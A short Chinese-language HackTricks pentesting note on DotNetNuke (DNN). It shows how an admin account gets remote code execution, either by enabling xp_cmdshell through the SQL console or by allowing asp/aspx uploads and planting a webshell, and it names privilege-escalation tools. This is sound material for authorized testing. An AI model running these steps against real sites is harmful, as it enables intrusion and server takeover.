hacktricks/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
2023-08-03 19:12:22 +00:00

4.1 KiB
Raw Blame History

DotNetNuke (DNN)

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

DotNetNuke (DNN)

如果你以管理员身份登录DNN很容易获得RCE。

RCE

通过SQL

在**Settings页面下可以访问SQL控制台你可以在那里启用xp_cmdshell运行操作系统命令**。

使用以下代码启用**xp_cmdshell**

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

然后,点击**"运行脚本"**来执行这些SQL语句。

接下来,使用类似下面的方法来执行操作系统命令:

xp_cmdshell 'whoami'

通过ASP Webshell

设置 -> 安全 -> 更多 -> 更多安全设置 下,你可以在 允许的文件扩展名 中添加新的允许扩展名,然后点击 保存 按钮。

添加 aspaspx,然后在 /admin/file-management 中上传一个名为 shell.aspasp webshell 作为示例。

然后访问 /Portals/0/shell.asp 来访问你的 webshell。

提权

你可以使用 PotatoesPrintSpoofer 等工具来进行 提权

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥